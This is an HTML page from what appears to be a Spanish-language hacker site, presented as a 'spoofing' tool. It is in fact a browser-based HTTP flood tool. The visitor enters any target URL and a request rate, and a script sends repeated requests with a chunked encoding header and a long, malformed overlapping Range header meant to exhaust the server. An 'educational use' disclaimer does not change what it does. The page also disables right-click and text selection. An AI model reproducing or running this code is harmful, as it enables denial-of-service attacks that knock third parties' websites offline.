<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
 <script>alert('SISTEMA SPOOFING, CREADO POR: PIRU PRO HACKING')</script>
        <meta charset="utf-8">
        <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">

       <div data-video="7wtfhZwyrcc" 
            data-autoplay="1"       
                    data-loop="1"        
           id="youtube-audio">
     <script src="https://www.youtube.com/iframe_api"></script>
     <script src="https://cdn.rawgit.com/labnol/files/master/yt.js"></script> 
   
	
  </div>
 <title>SPOOFING </title>
<link rel="SHORTCUT ICON" type="chliz" href="static/imagen/GBWEx-FW-400x400.jpg">


        <link rel="stylesheet" type="text/css" href="static/simditor/css/simditor.css" />

        <!-- Bootstrap CSS -->
        <!-- If you want to use the CDN insted of the local file, simply uncomment the line below and remove the local link -->
            <!-- <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css" integrity="sha384-Gn5384xqQ1aoWXA+058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW/dAiS6JXm" crossorigin="anonymous"> -->
        <link rel="stylesheet" href="static/bootstrap-4.0.0/css/bootstrap.min.css">
     


    </head>

   <style type="text/css">
body {

 background:  url("static/imagen/Anonymous-Pictures-Images-wallpaper-wp2002392.jpg");
background-repeat: no-repeat;
background-position: center;
background-attachment: fixed;
background-color: #000000;
margin-top: 5%;
margin-bottom: 5%;
margin-left: 15%;
margin-right: 15%;
font-family:"Courier New", Courier, monospace;
color: #FFFFFF;
}
.required { color: #d74646; font-size: 25px; font-weight: bold; font-style: italic; }
.success { color: #8cbc26; font-size: 444px;     font-weight: bold; font-style: italic; padding-bottom: 5px; }
.failed { color: #d74646; font-size: 16px; font-weight: bold; font-style: italic; padding-bottom: 5px; }
.number { color: #363635; font-family: Helvetica; font-size: 40px; font-weight: bold; padding-bottom: 5px; }
#footer { color: #363635; font-size: 12px; font-style: italic; margin-bottom: 10px; }



</style>


</head>

<fieldset>
<div id="footer"> <font size="+2" >  </font></div>
<img  src="static/imagen/GBWEx-FW-400x400.jpg" 
WIDTH=286 HEIGHT=160
>


                                <p><strong>Informacion</strong> </p>

                            <!-- More Options -->
                                 <button type="button" class="btn-sm btn-primary mb-3" data-toggle="collapse" data-target="#more-options" id="more-options-btn"><span id="show-more"></span> Mostrar Terminos Y Condiciones</button>
                                 <div class="collapse alert alert-secondary" id="more-options">
                                     <p class="m-0"><strong>   Nota: Este apartado es para uso educativo, por favor uselo con paginas de su propiedad, no nos hacemos responsable del mal uso que le den.         </strong>          <iframe src="https://www.facebook.com/plugins/like.php?
                         href=http%3A%2F%2Fwww.webhiveloic.webpin.com%2F1122031_inicio.html&amp;
                         send=false&amp;
                         layout=button_count&amp;
                         width=100&amp;
                         show_faces=false&amp;
                         action=like&amp;
                         colorscheme=light&amp;
                         font&amp;
                         height=21&amp;
                         appId=390177081063004"
                    scrolling="no"
                    frameborder="0"
                    style="border:none;
                           overflow:hidden;
                           width:100px;
                           height:21px;"
                    allowTransparency="true">
            </iframe></div><div id="gplus_button" class="button"><!-- Place this tag where you want the +1 button to render -->
    <div class="g-plusone" data-size="medium" data-annotation="none" data-href="http://webhiveloic.webpin.com"></div>

    <!-- Place this render call where appropriate -->
    <script type="text/javascript">
        window.___gcfg = {lang: "es"};
      (function() {
        var po = document.createElement("script"); po.type = "text/javascript"; po.async = true;
        po.src = "https://apis.google.com/js/plusone.js";
        var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(po, s);
      })();
    </script></div></div></div><div class="EOSID_CMSPAGE PageContPad" id="CMS1122031"><div style="text-align: center;">
	
<div id="title" style="text-align: center;">
	<br />
	 <script language="JavaScript" type="text/javascript">
//<![CDATA[

    VIH_BackColor = "black";

    VIH_ForeColor = "red";

    VIH_FontPix = "16";

    VIH_DisplayFormat = "Ip Falso: %%IP%% <br>Tu Host Virtual: %%HOST%%";

    VIH_DisplayOnPage = "yes";

    //]]>
    </script><script language="JavaScript" src="http://scripts.hashemian.com/js/visitorIPHOST.js.php" type="text/javascript">
</script></div>

 
<style type="text/css">

.title { color: #FFFFFF; font-size: 20px; font-weight: bold;    }
.required { color: #d74646; font-size: 33px; font-weight: bold;  }
.success { color: #FFFFFF; font-size: 20px; font-weight: bold;    }
.failed { color: #FFFFFF; font-size: 20px; font-weight: bold;   }
.number1 { color: #ffffff;  font-size: 30px; font-weight: bold; padding-bottom: 5px; }
.number2 { color: #0000ff; font-family: Helvetica; font-size: 30px; font-weight: bold; padding-bottom: 5px; }
.number3 { color: #FF0000; font-family: Helvetica; font-size: 30px; font-weight: bold; padding-bottom: 5px; }
#footer { color: #FFF2; font-size: 12px; margin-bottom: 10px; }
</style>
</head>
<script language="JavaScript"> 
<!-- Disable
function disableselect(e){
return true
}
function reEnable(){
return false
}
//if IE4+
document.onselectstart=new Function ("return false")
document.oncontextmenu=new Function ("return false")
//if NS6
if (window.sidebar){
document.onmousedown=disableselect
document.onclick=reEnable
}
//-->
</script>
</head>
<body onLoad="type()">

<fieldset>


<div >




<div id="hive" align="left">





<br>


<div id="container">
   
 <div id="section">
 <center>
 
  
        <div class="title" >URL Objetivo<span class="required"></span></div>
       
 
 
      <center>  <input type="text" id="targetURL"  placeholder= "&#x1f449; Pagina " value="">


<div id="section">

       <center> <div class="title">Peticiones</div>
        <input type="text" id="rps"  placeholder= "&#x1F525; 1000 recomendado" value="" style="">


</div>
<div id="section"><br>
      <center>  <button id="fireButton" class="btn-sm btn-primary mb-3" style="">EMPEZAR</button><br>
      

 </center>
</div>
 
<center><div id="section">
<br><font color="#FF0000">[</font>*************************<font color="#FF0000">]</font><br>


        <div class="title">Solicitudes</div>
        <div class="number1" id="requestedCtr">0</div>
        <div class="title">Logros
        <div class="number2" id="succeededCtr">0</div>
        <div class="title">Fallidos</div>

        <div class="number3" id="failedCtr">0</div>
 
</div>
 
<div id="footer"></div>
</div>
 </center>
 
<script>
       (function () {
 
            var fireInterval;
            var isFiring = false;
 
            var requestedCtrNode = document.getElementById("requestedCtr"),
                succeededCtrNode = document.getElementById("succeededCtr"),
                failedCtrNode = document.getElementById("failedCtr"),
                targetURLNode = document.getElementById("targetURL"),
                fireButton = document.getElementById("fireButton"),
                rpsNode = document.getElementById("rps"),
                timeoutNode = document.getElementById("timeout");
 
            var targetURL = targetURLNode.value;
            targetURLNode.onchange = function () {
                targetURL = this.value;
            };
 
            var requestedCtr = 0,
                succeededCtr = 0,
                failedCtr = 0;
 
            var methods = new Array("HEAD", "POST", "GET");
 
            var makeHttpRequest = function () { 
                var rID =Number(Math.random());
                var randomNum=Math.floor(Math.random()*2);
                jsHTTP = new XMLHttpRequest();
                jsHTTP.open(methods[randomNum],targetURL,true);
                jsHTTP.setRequestHeader("Referer", "");
                jsHTTP.setRequestHeader("Transfer-Encoding", "chunked");
                jsHTTP.setRequestHeader("Range", "bytes=0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-");
                jsHTTP.send("id="+rID);
                onRequest(rID);
            };
 
            var onRequest = function (rID) {
                    requestedCtr++;
                    requestedCtrNode.innerHTML = requestedCtr;
                                        succeededCtrNode.innerHTML = requestedCtr;
            };
 
            fireButton.onclick = function () {
                if (isFiring) {
                    clearInterval(fireInterval);
                    isFiring = false;
                    this.innerHTML = "EMPEZAR";
                } else {
                    isFiring = true;
                    this.innerHTML = "PARAR";
                    fireInterval = setInterval(makeHttpRequest, (1000 / parseInt(rpsNode.value) | 0));
                }
            };
 
        })();
</script>
 
 
</fieldset>

<br><script type="text/javascript" src="http://www.usuarios-online.com/usuarios.php?v=www.e-viphostchile.tk/acta.html"></script> <a href="http://www.usuarios-online.com/en/" target="_blank">usuarios en linea</a>
</body>
</html>

 
       
          

    <!-- Optional JavaScript -->
        <!-- If you want to use th CDN and not the local jquery file to save space then uncomment the CDN script tags and remove the local script tags. -->

    <!-- JQUERY -->
        <!-- <script src="https://code.jquery.com/jquery-3.2.1.slim.min.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN" crossorigin="anonymous"></script>-->
        <script src="static/bootstrap-4.0.0/js/jquery-3.2.1.slim.min.js"></script>

    <!-- BOOTSTRAP -->
        <!-- <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js" integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q" crossorigin="anonymous"></script>
        <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js" integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl" crossorigin="anonymous"></script> -->
        <script src="static/bootstrap-4.0.0/js/bootstrap.bundle.min.js"></script>

    <!-- Ritch Text Editor Simditor JS -->
    <script src="static/simditor/js/module.js"></script>
    <script src="static/simditor/js/hotkeys.js"></script>
    <script src="static/simditor/js/uploader.js"></script>
    <script src="static/simditor/js/simditor.js"></script>

    <!-- Custom Scripts -->
    <script>
    // Required snippit to initalize simditor. It is looking for the ID of the textara as listed above
    var editor = new Simditor({
        textarea: $('#editor')
        //optional options added here
        });

    // Required snippit to initalize the tooltips in Bootstrap
    $(function () {
      $('[data-toggle="tooltip"]').tooltip()
    })

    // Toggle show more btn text
    // Not sure if this is the ideal way to do this, but it works
    var showMoreOptions = false; // Start with false, because it is hidden by default
    $('#more-options-btn').click(function(){ // On click check if var is true or false
        if(!showMoreOptions) {
            // When it expands content switch to hide
            $('#show-more').replaceWith("<span id='show-less'>Hide</span>");
            showMoreOptions = true;
        } else {
            // She collapsed switch to show
            $('#show-less').replaceWith("<span id='show-more'>Show</span>");
            showMoreOptions = false;
        }
    });

    // File Upload change
    function fileNameChange(){
        var fileName = document.getElementById("customFile").files[0].name;
        console.log("User uploaded " + fileName);
        document.getElementById("customFileText").innerHTML = fileName;
    };

    </script>
  
               
               
            </div>
        </div>
    </section>
</body>

</html>
           
